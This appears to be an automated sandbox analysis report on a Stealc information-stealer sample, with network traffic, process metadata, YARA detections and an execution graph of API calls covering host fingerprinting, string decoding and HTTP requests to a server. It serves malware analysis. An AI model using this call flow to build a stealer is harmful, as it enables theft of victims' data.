                                Dec 23, 2024 07:58:53.398169041 CET44349734135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:53.398283958 CET49734443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:53.398360014 CET49734443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:53.398406029 CET44349734135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:53.398503065 CET49734443192.168.2.9135.181.65.216
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 23, 2024 07:58:39.600608110 CET1.1.1.1192.168.2.90x6ebfNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Dec 23, 2024 07:58:39.600608110 CET1.1.1.1192.168.2.90x6ebfNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:01:58:42
                                Start date:23/12/2024
                                Path:C:\Users\user\Desktop\stealcy11.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\stealcy11.exe"
                                Imagebase:0x8e0000
                                File size:245'760 bytes
                                MD5 hash:004431FC72FC1228ABF10E298EFA0271
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:01:59:05
                                Start date:23/12/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
                                Imagebase:0x650000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:19.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:26.2%
                                  Total number of Nodes:1290
                                  Total number of Limit Nodes:33
                                  execution_graph 5262 906710 5263 90671d 43 API calls 5262->5263 5264 906b2e 8 API calls 5262->5264 5263->5264 5265 906bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5264->5265 5266 906c38 5264->5266 5265->5266 5267 906d02 5266->5267 5268 906c45 8 API calls 5266->5268 5269 906d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5267->5269 5270 906d7f 5267->5270 5268->5267 5269->5270 5271 906e19 5270->5271 5272 906d8c 6 API calls 5270->5272 5273 906f40 5271->5273 5274 906e26 12 API calls 5271->5274 5272->5271 5275 906f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5273->5275 5276 906fbd 5273->5276 5274->5273 5275->5276 5277 906ff1 5276->5277 5278 906fc6 GetProcAddress GetProcAddress 5276->5278 5279 907025 5277->5279 5280 906ffa GetProcAddress GetProcAddress 5277->5280 5278->5277 5281 907032 10 API calls 5279->5281 5282 90711d 5279->5282 5280->5279 5281->5282 5283 907182 5282->5283 5284 907126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5282->5284 5285 90718b GetProcAddress 5283->5285 5286 90719e 5283->5286 5284->5283 5285->5286 5287 907203 5286->5287 5288 9071a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5286->5288 5288->5287 5300 901bd0 5325 8e29a0 5300->5325 5304 901be3 5305 901c15 GetUserDefaultLangID 5304->5305 5306 901c3e 5305->5306 5426 902a70 GetProcessHeap HeapAlloc GetComputerNameA 5306->5426 5308 901c43 5309 901c6d lstrlenA 5308->5309 5310 901c85 5309->5310 5311 901ca9 lstrlenA 5310->5311 5312 901cbf 5311->5312 5313 902a70 3 API calls 5312->5313 5314 901ce5 lstrlenA 5313->5314 5315 901cfa 5314->5315 5316 901d20 lstrlenA 5315->5316 5317 901d36 5316->5317 5428 9029e0 GetProcessHeap HeapAlloc GetUserNameA 5317->5428 5319 901d59 lstrlenA 5320 901d6d 5319->5320 5321 901ddc OpenEventA 5320->5321 5322 901e14 CreateEventA 5321->5322 5429 901b00 GetSystemTime 5322->5429 5324 901e28 5437 8e4980 17 API calls 5325->5437 5327 8e29b1 5328 8e4980 34 API calls 5327->5328 5329 8e29c7 5328->5329 5330 8e4980 34 API calls 5329->5330 5331 8e29dd 5330->5331 5332 8e4980 34 API calls 5331->5332 5333 8e29f3 5332->5333 5334 8e4980 34 API calls 5333->5334 5335 8e2a09 5334->5335 5336 8e4980 34 API calls 5335->5336 5337 8e2a1f 5336->5337 5338 8e4980 34 API calls 5337->5338 5339 8e2a38 5338->5339 5340 8e4980 34 API calls 5339->5340 5341 8e2a4e 5340->5341 5342 8e4980 34 API calls 5341->5342 5343 8e2a64 5342->5343 5344 8e4980 34 API calls 5343->5344 5345 8e2a7a 5344->5345 5346 8e4980 34 API calls 5345->5346 5347 8e2a90 5346->5347 5348 8e4980 34 API calls 5347->5348 5349 8e2aa6 5348->5349 5350 8e4980 34 API calls 5349->5350 5351 8e2abf 5350->5351 5352 8e4980 34 API calls 5351->5352 5353 8e2ad5 5352->5353 5354 8e4980 34 API calls 5353->5354 5355 8e2aeb 5354->5355 5356 8e4980 34 API calls 5355->5356 5357 8e2b01 5356->5357 5358 8e4980 34 API calls 5357->5358 5359 8e2b17 5358->5359 5360 8e4980 34 API calls 5359->5360 5361 8e2b2d 5360->5361 5362 8e4980 34 API calls 5361->5362 5363 8e2b46 5362->5363 5364 8e4980 34 API calls 5363->5364 5365 8e2b5c 5364->5365 5366 8e4980 34 API calls 5365->5366 5367 8e2b72 5366->5367 5368 8e4980 34 API calls 5367->5368 5369 8e2b88 5368->5369 5370 8e4980 34 API calls 5369->5370 5371 8e2b9e 5370->5371 5372 8e4980 34 API calls 5371->5372 5373 8e2bb4 5372->5373 5374 8e4980 34 API calls 5373->5374 5375 8e2bcd 5374->5375 5376 8e4980 34 API calls 5375->5376 5377 8e2be3 5376->5377 5378 8e4980 34 API calls 5377->5378 5379 8e2bf9 5378->5379 5380 8e4980 34 API calls 5379->5380 5381 8e2c0f 5380->5381 5382 8e4980 34 API calls 5381->5382 5383 8e2c25 5382->5383 5384 8e4980 34 API calls 5383->5384 5385 8e2c3b 5384->5385 5386 8e4980 34 API calls 5385->5386 5387 8e2c54 5386->5387 5388 8e4980 34 API calls 5387->5388 5389 8e2c6a 5388->5389 5390 8e4980 34 API calls 5389->5390 5391 8e2c80 5390->5391 5392 8e4980 34 API calls 5391->5392 5393 8e2c96 5392->5393 5394 8e4980 34 API calls 5393->5394 5395 8e2cac 5394->5395 5396 8e4980 34 API calls 5395->5396 5397 8e2cc2 5396->5397 5398 8e4980 34 API calls 5397->5398 5399 8e2cdb 5398->5399 5400 8e4980 34 API calls 5399->5400 5401 8e2cf1 5400->5401 5402 8e4980 34 API calls 5401->5402 5403 8e2d07 5402->5403 5404 8e4980 34 API calls 5403->5404 5405 8e2d1d 5404->5405 5406 8e4980 34 API calls 5405->5406 5407 8e2d33 5406->5407 5408 8e4980 34 API calls 5407->5408 5409 8e2d49 5408->5409 5410 8e4980 34 API calls 5409->5410 5411 8e2d62 5410->5411 5412 9063c0 GetPEB 5411->5412 5413 9065f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 5412->5413 5414 9063f3 5412->5414 5415 906655 GetProcAddress 5413->5415 5416 906668 5413->5416 5421 906407 20 API calls 5414->5421 5415->5416 5417 906671 GetProcAddress GetProcAddress 5416->5417 5418 90669c 5416->5418 5417->5418 5419 9066a5 GetProcAddress 5418->5419 5420 9066b8 5418->5420 5419->5420 5422 9066c1 GetProcAddress 5420->5422 5423 9066d4 5420->5423 5421->5413 5422->5423 5424 906707 5423->5424 5425 9066dd GetProcAddress GetProcAddress 5423->5425 5424->5304 5425->5424 5427 902ac4 5426->5427 5427->5308 5428->5319 5441 901800 5429->5441 5431 901b61 sscanf 5480 8e2930 5431->5480 5434 901bb6 5435 901bc9 5434->5435 5436 901bc2 ExitProcess 5434->5436 5435->5324 5438 8e4a1e 5437->5438 5439 8e4a9a 6 API calls 5437->5439 5440 8e4a26 11 API calls 5438->5440 5439->5327 5440->5439 5440->5440 5442 90180e 5441->5442 5443 901835 lstrlenA 5442->5443 5444 901829 lstrcpy 5442->5444 5445 901853 5443->5445 5444->5443 5446 901865 lstrcpy lstrcatA 5445->5446 5447 901878 5445->5447 5446->5447 5448 9018a7 5447->5448 5449 90189f lstrcpy 5447->5449 5450 9018ae lstrlenA 5448->5450 5449->5448 5451 9018c6 5450->5451 5452 9018d2 lstrcpy lstrcatA 5451->5452 5453 9018e6 5451->5453 5452->5453 5454 901915 5453->5454 5455 90190d lstrcpy 5453->5455 5456 90191c lstrlenA 5454->5456 5455->5454 5457 901938 5456->5457 5458 90194a lstrcpy lstrcatA 5457->5458 5459 90195d 5457->5459 5458->5459 5460 90198c 5459->5460 5461 901984 lstrcpy 5459->5461 5462 901993 lstrlenA 5460->5462 5461->5460 5463 9019ab 5462->5463 5464 9019b7 lstrcpy lstrcatA 5463->5464 5466 9019cb 5463->5466 5464->5466 5465 9019fa 5468 901a01 lstrlenA 5465->5468 5466->5465 5467 9019f2 lstrcpy 5466->5467 5467->5465 5469 901a1d 5468->5469 5470 901a2f lstrcpy lstrcatA 5469->5470 5471 901a42 5469->5471 5470->5471 5472 901a71 5471->5472 5473 901a69 lstrcpy 5471->5473 5474 901a78 lstrlenA 5472->5474 5473->5472 5475 901a94 5474->5475 5476 901aa6 lstrcpy lstrcatA 5475->5476 5477 901ab9 5475->5477 5476->5477 5478 901ae8 5477->5478 5479 901ae0 lstrcpy 5477->5479 5478->5431 5479->5478 5481 8e2934 SystemTimeToFileTime SystemTimeToFileTime 5480->5481 5481->5434 5481->5435 5495 8e4b80 5496 8e4ba0 5495->5496 5497 8e4bb5 5496->5497 5498 8e4bad lstrcpy 5496->5498 5649 8e4ae0 5497->5649 5498->5497 5500 8e4bc0 5501 8e4bfc lstrcpy 5500->5501 5502 8e4c08 5500->5502 5501->5502 5503 8e4c2f lstrcpy 5502->5503 5504 8e4c3b 5502->5504 5503->5504 5505 8e4c5f lstrcpy 5504->5505 5506 8e4c6b 5504->5506 5505->5506 5507 8e4c9d lstrcpy 5506->5507 5508 8e4ca9 5506->5508 5507->5508 5509 8e4cdc InternetOpenA StrCmpCA 5508->5509 5510 8e4cd0 lstrcpy 5508->5510 5511 8e4d10 5509->5511 5510->5509 5512 8e4d1f 5511->5512 5513 8e53e8 InternetCloseHandle CryptStringToBinaryA 5511->5513 5653 903e10 5512->5653 5514 8e5418 LocalAlloc 5513->5514 5531 8e5508 5513->5531 5516 8e542f CryptStringToBinaryA 5514->5516 5514->5531 5517 8e5459 lstrlenA 5516->5517 5518 8e5447 LocalFree 5516->5518 5519 8e546d 5517->5519 5518->5531 5521 8e5487 lstrcpy 5519->5521 5522 8e5493 lstrlenA 5519->5522 5520 8e4d2a 5523 8e4d53 lstrcpy lstrcatA 5520->5523 5524 8e4d68 5520->5524 5521->5522 5526 8e54ad 5522->5526 5523->5524 5525 8e4d8a lstrcpy 5524->5525 5528 8e4d92 5524->5528 5525->5528 5527 8e54bf lstrcpy lstrcatA 5526->5527 5529 8e54d2 5526->5529 5527->5529 5530 8e4da1 lstrlenA 5528->5530 5532 8e5501 5529->5532 5534 8e54f9 lstrcpy 5529->5534 5533 8e4db9 5530->5533 5532->5531 5535 8e4dc5 lstrcpy lstrcatA 5533->5535 5536 8e4ddc 5533->5536 5534->5532 5535->5536 5537 8e4e05 5536->5537 5538 8e4dfd lstrcpy 5536->5538 5539 8e4e0c lstrlenA 5537->5539 5538->5537 5540 8e4e22 5539->5540 5541 8e4e2e lstrcpy lstrcatA 5540->5541 5542 8e4e45 5540->5542 5541->5542 5543 8e4e66 lstrcpy 5542->5543 5544 8e4e6e 5542->5544 5543->5544 5545 8e4e95 lstrcpy lstrcatA 5544->5545 5546 8e4eab 5544->5546 5545->5546 5547 8e4ed4 5546->5547 5548 8e4ecc lstrcpy 5546->5548 5549 8e4edb lstrlenA 5547->5549 5548->5547 5550 8e4ef1 5549->5550 5551 8e4efd lstrcpy lstrcatA 5550->5551 5552 8e4f14 5550->5552 5551->5552 5553 8e4f3d 5552->5553 5554 8e4f35 lstrcpy 5552->5554 5555 8e4f44 lstrlenA 5553->5555 5554->5553 5556 8e4f5a 5555->5556 5557 8e4f66 lstrcpy lstrcatA 5556->5557 5558 8e4f7d 5556->5558 5557->5558 5559 8e4fa9 5558->5559 5560 8e4fa1 lstrcpy 5558->5560 5561 8e4fb0 lstrlenA 5559->5561 5560->5559 5562 8e4fcb 5561->5562 5563 8e4fdc lstrcpy lstrcatA 5562->5563 5564 8e4fec 5562->5564 5563->5564 5565 8e500a lstrcpy lstrcatA 5564->5565 5566 8e501d 5564->5566 5565->5566 5567 8e503b lstrcpy 5566->5567 5568 8e5043 5566->5568 5567->5568 5569 8e5051 InternetConnectA 5568->5569 5569->5513 5570 8e5080 HttpOpenRequestA 5569->5570 5571 8e50bb 5570->5571 5572 8e53e1 InternetCloseHandle 5570->5572 5660 907340 lstrlenA 5571->5660 5572->5513 5576 8e50d4 5668 9072f0 5576->5668 5579 9072b0 lstrcpy 5580 8e50f0 5579->5580 5581 907340 3 API calls 5580->5581 5582 8e5105 5581->5582 5583 9072b0 lstrcpy 5582->5583 5584 8e510e 5583->5584 5585 907340 3 API calls 5584->5585 5586 8e5124 5585->5586 5587 9072b0 lstrcpy 5586->5587 5588 8e512d 5587->5588 5589 907340 3 API calls 5588->5589 5590 8e5143 5589->5590 5591 9072b0 lstrcpy 5590->5591 5592 8e514c 5591->5592 5593 907340 3 API calls 5592->5593 5594 8e5161 5593->5594 5595 9072b0 lstrcpy 5594->5595 5596 8e516a 5595->5596 5597 9072f0 2 API calls 5596->5597 5598 8e517d 5597->5598 5599 9072b0 lstrcpy 5598->5599 5600 8e5186 5599->5600 5601 907340 3 API calls 5600->5601 5602 8e519b 5601->5602 5603 9072b0 lstrcpy 5602->5603 5604 8e51a4 5603->5604 5605 907340 3 API calls 5604->5605 5606 8e51b9 5605->5606 5607 9072b0 lstrcpy 5606->5607 5608 8e51c2 5607->5608 5609 9072f0 2 API calls 5608->5609 5610 8e51d5 5609->5610 5611 9072b0 lstrcpy 5610->5611 5612 8e51de 5611->5612 5613 907340 3 API calls 5612->5613 5614 8e51f3 5613->5614 5615 9072b0 lstrcpy 5614->5615 5616 8e51fc 5615->5616 5617 907340 3 API calls 5616->5617 5618 8e5212 5617->5618 5619 9072b0 lstrcpy 5618->5619 5620 8e521b 5619->5620 5621 907340 3 API calls 5620->5621 5622 8e5231 5621->5622 5623 9072b0 lstrcpy 5622->5623 5624 8e523a 5623->5624 5625 907340 3 API calls 5624->5625 5626 8e524f 5625->5626 5627 9072b0 lstrcpy 5626->5627 5628 8e5258 5627->5628 5629 9072f0 2 API calls 5628->5629 5630 8e526b 5629->5630 5631 9072b0 lstrcpy 5630->5631 5632 8e5274 5631->5632 5633 8e52ac 5632->5633 5634 8e52a0 lstrcpy 5632->5634 5635 9072f0 2 API calls 5633->5635 5634->5633 5636 8e52ba 5635->5636 5637 9072f0 2 API calls 5636->5637 5638 8e52c7 5637->5638 5639 9072b0 lstrcpy 5638->5639 5640 8e52d1 5639->5640 5641 8e52e1 lstrlenA lstrlenA HttpSendRequestA InternetReadFile 5640->5641 5642 8e53cc InternetCloseHandle 5641->5642 5646 8e5322 5641->5646 5644 8e53de 5642->5644 5643 8e532d lstrlenA 5643->5646 5644->5572 5645 8e535e lstrcpy lstrcatA 5645->5646 5646->5642 5646->5643 5646->5645 5647 8e539b lstrcpy 5646->5647 5648 8e53aa InternetReadFile 5646->5648 5647->5646 5648->5642 5648->5646 5650 8e4af0 5649->5650 5650->5650 5651 8e4af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 5650->5651 5652 8e4b61 5651->5652 5652->5500 5654 903e23 5653->5654 5655 903e3f lstrcpy 5654->5655 5656 903e4b 5654->5656 5655->5656 5657 903e75 GetSystemTime 5656->5657 5658 903e6d lstrcpy 5656->5658 5659 903e93 5657->5659 5658->5657 5659->5520 5662 90735d 5660->5662 5661 8e50cb 5664 9072b0 5661->5664 5662->5661 5663 90736d lstrcpy lstrcatA 5662->5663 5663->5661 5665 9072bc 5664->5665 5666 9072e4 5665->5666 5667 9072dc lstrcpy 5665->5667 5666->5576 5667->5666 5670 90730c 5668->5670 5669 8e50e7 5669->5579 5670->5669 5671 90731d lstrcpy lstrcatA 5670->5671 5671->5669 6312 8ff300 lstrlenA 6313 8ff33e 6312->6313 6314 8ff346 lstrcpy 6313->6314 6315 8ff352 lstrlenA 6313->6315 6314->6315 6316 8ff363 6315->6316 6317 8ff36b lstrcpy 6316->6317 6318 8ff377 lstrlenA 6316->6318 6317->6318 6319 8ff388 6318->6319 6320 8ff390 lstrcpy 6319->6320 6321 8ff39c 6319->6321 6320->6321 6322 8ff3b8 lstrcpy 6321->6322 6323 8ff3c4 6321->6323 6322->6323 6324 8ff3e6 lstrcpy 6323->6324 6325 8ff3f2 6323->6325 6324->6325 6326 8ff41c lstrcpy 6325->6326 6327 8ff428 6325->6327 6326->6327 6328 8ff44e lstrcpy 6327->6328 6378 8ff460 6327->6378 6328->6378 6329 8ff46c lstrlenA 6329->6378 6330 8ff626 lstrcpy 6330->6378 6331 8ff504 lstrcpy 6331->6378 6332 8ff529 lstrcpy 6332->6378 6333 8e1410 8 API calls 6333->6378 6334 8ff656 lstrcpy 6394 8ff65e 6334->6394 6335 8ff5e0 lstrcpy 6335->6378 6336 8ff70d lstrcpy 6336->6394 6337 8ff88a StrCmpCA 6343 900061 6337->6343 6337->6378 6338 8ff788 StrCmpCA 6338->6337 6338->6394 6339 8ffbcb StrCmpCA 6349 8ffff8 6339->6349 6339->6378 6340 8ff8ba lstrlenA 6340->6378 6341 8fff0b StrCmpCA 6347 8fff1f Sleep 6341->6347 6356 8fff35 6341->6356 6342 900083 lstrlenA 6354 90009f 6342->6354 6343->6342 6344 90007b lstrcpy 6343->6344 6344->6342 6345 8ff7be lstrcpy 6345->6394 6346 8ffbfb lstrlenA 6346->6378 6347->6378 6348 90001a lstrlenA 6352 900036 6348->6352 6349->6348 6351 900012 lstrcpy 6349->6351 6350 8ffa26 lstrcpy 6350->6378 6351->6348 6362 8fff94 lstrlenA 6352->6362 6364 90004f lstrcpy 6352->6364 6353 9000c0 lstrlenA 6369 9000dc 6353->6369 6354->6353 6360 9000b8 lstrcpy 6354->6360 6355 8ff8ed lstrcpy 6355->6378 6357 8fff57 lstrlenA 6356->6357 6358 8fff4f lstrcpy 6356->6358 6367 8fff73 6357->6367 6358->6357 6359 8ffd66 lstrcpy 6359->6378 6360->6353 6361 8ffc2e lstrcpy 6361->6378 6380 8fffb0 6362->6380 6363 8ff910 lstrcpy 6363->6378 6364->6362 6366 8ffa56 lstrcpy 6366->6394 6367->6362 6374 8fff8c lstrcpy 6367->6374 6368 8e1410 8 API calls 6368->6394 6370 9000fd 6369->6370 6376 9000f5 lstrcpy 6369->6376 6377 8e1510 4 API calls 6370->6377 6371 8ff812 lstrcpy 6371->6394 6372 8fefe0 28 API calls 6372->6378 6373 8ffc51 lstrcpy 6373->6378 6374->6362 6375 8ffd96 lstrcpy 6375->6394 6376->6370 6396 8fffdd 6377->6396 6378->6329 6378->6330 6378->6331 6378->6332 6378->6333 6378->6334 6378->6335 6378->6337 6378->6339 6378->6340 6378->6341 6378->6346 6378->6350 6378->6355 6378->6359 6378->6361 6378->6363 6378->6366 6378->6372 6378->6373 6378->6375 6384 8ff964 lstrcpy 6378->6384 6387 8ffca5 lstrcpy 6378->6387 6378->6394 6379 8ff100 36 API calls 6379->6394 6381 8fffd1 6380->6381 6382 8fffc9 lstrcpy 6380->6382 6397 8e1510 6381->6397 6382->6381 6384->6378 6385 8ffab5 lstrcpy 6385->6394 6386 8ffb30 StrCmpCA 6386->6339 6386->6394 6387->6378 6388 8ffdf5 lstrcpy 6388->6394 6389 8ffe70 StrCmpCA 6389->6341 6389->6394 6390 8ffb63 lstrcpy 6390->6394 6391 8fefe0 28 API calls 6391->6394 6392 8ffea3 lstrcpy 6392->6394 6393 8ffbb7 lstrcpy 6393->6394 6394->6336 6394->6338 6394->6339 6394->6341 6394->6345 6394->6368 6394->6371 6394->6378 6394->6379 6394->6385 6394->6386 6394->6388 6394->6389 6394->6390 6394->6391 6394->6392 6394->6393 6395 8ffef7 lstrcpy 6394->6395 6395->6394 6398 8e151f 6397->6398 6399 8e152b lstrcpy 6398->6399 6400 8e1533 6398->6400 6399->6400 6401 8e154d lstrcpy 6400->6401 6402 8e1555 6400->6402 6401->6402 6403 8e156f lstrcpy 6402->6403 6404 8e1577 6402->6404 6403->6404 6405 8e1599 6404->6405 6406 8e1591 lstrcpy 6404->6406 6405->6396 6406->6405 5672 8e2d90 5673 8e4980 34 API calls 5672->5673 5674 8e2da2 5673->5674 5675 8e4980 34 API calls 5674->5675 5676 8e2dc0 5675->5676 5677 8e4980 34 API calls 5676->5677 5678 8e2dd5 5677->5678 5679 8e4980 34 API calls 5678->5679 5680 8e2dea 5679->5680 5681 8e4980 34 API calls 5680->5681 5682 8e2e0b 5681->5682 5683 8e4980 34 API calls 5682->5683 5684 8e2e20 5683->5684 5685 8e4980 34 API calls 5684->5685 5686 8e2e38 5685->5686 5687 8e4980 34 API calls 5686->5687 5688 8e2e59 5687->5688 5689 8e4980 34 API calls 5688->5689 5690 8e2e6e 5689->5690 5691 8e4980 34 API calls 5690->5691 5692 8e2e84 5691->5692 5693 8e4980 34 API calls 5692->5693 5694 8e2e9a 5693->5694 5695 8e4980 34 API calls 5694->5695 5696 8e2eb0 5695->5696 5697 8e4980 34 API calls 5696->5697 5698 8e2ec9 5697->5698 5699 8e4980 34 API calls 5698->5699 5700 8e2edf 5699->5700 5701 8e4980 34 API calls 5700->5701 5702 8e2ef5 5701->5702 5703 8e4980 34 API calls 5702->5703 5704 8e2f0b 5703->5704 5705 8e4980 34 API calls 5704->5705 5706 8e2f21 5705->5706 5707 8e4980 34 API calls 5706->5707 5708 8e2f37 5707->5708 5709 8e4980 34 API calls 5708->5709 5710 8e2f50 5709->5710 5711 8e4980 34 API calls 5710->5711 5712 8e2f66 5711->5712 5713 8e4980 34 API calls 5712->5713 5714 8e2f7c 5713->5714 5715 8e4980 34 API calls 5714->5715 5716 8e2f92 5715->5716 5717 8e4980 34 API calls 5716->5717 5718 8e2fa8 5717->5718 5719 8e4980 34 API calls 5718->5719 5720 8e2fbe 5719->5720 5721 8e4980 34 API calls 5720->5721 5722 8e2fd7 5721->5722 5723 8e4980 34 API calls 5722->5723 5724 8e2fed 5723->5724 5725 8e4980 34 API calls 5724->5725 5726 8e3003 5725->5726 5727 8e4980 34 API calls 5726->5727 5728 8e3019 5727->5728 5729 8e4980 34 API calls 5728->5729 5730 8e302f 5729->5730 5731 8e4980 34 API calls 5730->5731 5732 8e3045 5731->5732 5733 8e4980 34 API calls 5732->5733 5734 8e305e 5733->5734 5735 8e4980 34 API calls 5734->5735 5736 8e3074 5735->5736 5737 8e4980 34 API calls 5736->5737 5738 8e308a 5737->5738 5739 8e4980 34 API calls 5738->5739 5740 8e30a0 5739->5740 5741 8e4980 34 API calls 5740->5741 5742 8e30b6 5741->5742 5743 8e4980 34 API calls 5742->5743 5744 8e30cc 5743->5744 5745 8e4980 34 API calls 5744->5745 5746 8e30e5 5745->5746 5747 8e4980 34 API calls 5746->5747 5748 8e30fb 5747->5748 5749 8e4980 34 API calls 5748->5749 5750 8e3111 5749->5750 5751 8e4980 34 API calls 5750->5751 5752 8e3127 5751->5752 5753 8e4980 34 API calls 5752->5753 5754 8e313d 5753->5754 5755 8e4980 34 API calls 5754->5755 5756 8e3153 5755->5756 5757 8e4980 34 API calls 5756->5757 5758 8e316c 5757->5758 5759 8e4980 34 API calls 5758->5759 5760 8e3182 5759->5760 5761 8e4980 34 API calls 5760->5761 5762 8e3198 5761->5762 5763 8e4980 34 API calls 5762->5763 5764 8e31ae 5763->5764 5765 8e4980 34 API calls 5764->5765 5766 8e31c4 5765->5766 5767 8e4980 34 API calls 5766->5767 5768 8e31da 5767->5768 5769 8e4980 34 API calls 5768->5769 5770 8e31f3 5769->5770 5771 8e4980 34 API calls 5770->5771 5772 8e3209 5771->5772 5773 8e4980 34 API calls 5772->5773 5774 8e321f 5773->5774 5775 8e4980 34 API calls 5774->5775 5776 8e3235 5775->5776 5777 8e4980 34 API calls 5776->5777 5778 8e324b 5777->5778 5779 8e4980 34 API calls 5778->5779 5780 8e3261 5779->5780 5781 8e4980 34 API calls 5780->5781 5782 8e327a 5781->5782 5783 8e4980 34 API calls 5782->5783 5784 8e3290 5783->5784 5785 8e4980 34 API calls 5784->5785 5786 8e32a6 5785->5786 5787 8e4980 34 API calls 5786->5787 5788 8e32bc 5787->5788 5789 8e4980 34 API calls 5788->5789 5790 8e32d2 5789->5790 5791 8e4980 34 API calls 5790->5791 5792 8e32e8 5791->5792 5793 8e4980 34 API calls 5792->5793 5794 8e3301 5793->5794 5795 8e4980 34 API calls 5794->5795 5796 8e3317 5795->5796 5797 8e4980 34 API calls 5796->5797 5798 8e332d 5797->5798 5799 8e4980 34 API calls 5798->5799 5800 8e3343 5799->5800 5801 8e4980 34 API calls 5800->5801 5802 8e3359 5801->5802 5803 8e4980 34 API calls 5802->5803 5804 8e336f 5803->5804 5805 8e4980 34 API calls 5804->5805 5806 8e3388 5805->5806 5807 8e4980 34 API calls 5806->5807 5808 8e339e 5807->5808 5809 8e4980 34 API calls 5808->5809 5810 8e33b4 5809->5810 5811 8e4980 34 API calls 5810->5811 5812 8e33ca 5811->5812 5813 8e4980 34 API calls 5812->5813 5814 8e33e0 5813->5814 5815 8e4980 34 API calls 5814->5815 5816 8e33f6 5815->5816 5817 8e4980 34 API calls 5816->5817 5818 8e340f 5817->5818 5819 8e4980 34 API calls 5818->5819 5820 8e3425 5819->5820 5821 8e4980 34 API calls 5820->5821 5822 8e343b 5821->5822 5823 8e4980 34 API calls 5822->5823 5824 8e3451 5823->5824 5825 8e4980 34 API calls 5824->5825 5826 8e3467 5825->5826 5827 8e4980 34 API calls 5826->5827 5828 8e347d 5827->5828 5829 8e4980 34 API calls 5828->5829 5830 8e3496 5829->5830 5831 8e4980 34 API calls 5830->5831 5832 8e34ac 5831->5832 5833 8e4980 34 API calls 5832->5833 5834 8e34c2 5833->5834 5835 8e4980 34 API calls 5834->5835 5836 8e34d8 5835->5836 5837 8e4980 34 API calls 5836->5837 5838 8e34ee 5837->5838 5839 8e4980 34 API calls 5838->5839 5840 8e3504 5839->5840 5841 8e4980 34 API calls 5840->5841 5842 8e351d 5841->5842 5843 8e4980 34 API calls 5842->5843 5844 8e3533 5843->5844 5845 8e4980 34 API calls 5844->5845 5846 8e3549 5845->5846 5847 8e4980 34 API calls 5846->5847 5848 8e355f 5847->5848 5849 8e4980 34 API calls 5848->5849 5850 8e3575 5849->5850 5851 8e4980 34 API calls 5850->5851 5852 8e358b 5851->5852 5853 8e4980 34 API calls 5852->5853 5854 8e35a4 5853->5854 5855 8e4980 34 API calls 5854->5855 5856 8e35ba 5855->5856 5857 8e4980 34 API calls 5856->5857 5858 8e35d0 5857->5858 5859 8e4980 34 API calls 5858->5859 5860 8e35e6 5859->5860 5861 8e4980 34 API calls 5860->5861 5862 8e35fc 5861->5862 5863 8e4980 34 API calls 5862->5863 5864 8e3612 5863->5864 5865 8e4980 34 API calls 5864->5865 5866 8e362b 5865->5866 5867 8e4980 34 API calls 5866->5867 5868 8e3641 5867->5868 5869 8e4980 34 API calls 5868->5869 5870 8e3657 5869->5870 5871 8e4980 34 API calls 5870->5871 5872 8e366d 5871->5872 5873 8e4980 34 API calls 5872->5873 5874 8e3683 5873->5874 5875 8e4980 34 API calls 5874->5875 5876 8e3699 5875->5876 5877 8e4980 34 API calls 5876->5877 5878 8e36b2 5877->5878 5879 8e4980 34 API calls 5878->5879 5880 8e36c8 5879->5880 5881 8e4980 34 API calls 5880->5881 5882 8e36de 5881->5882 5883 8e4980 34 API calls 5882->5883 5884 8e36f4 5883->5884 5885 8e4980 34 API calls 5884->5885 5886 8e370a 5885->5886 5887 8e4980 34 API calls 5886->5887 5888 8e3720 5887->5888 5889 8e4980 34 API calls 5888->5889 5890 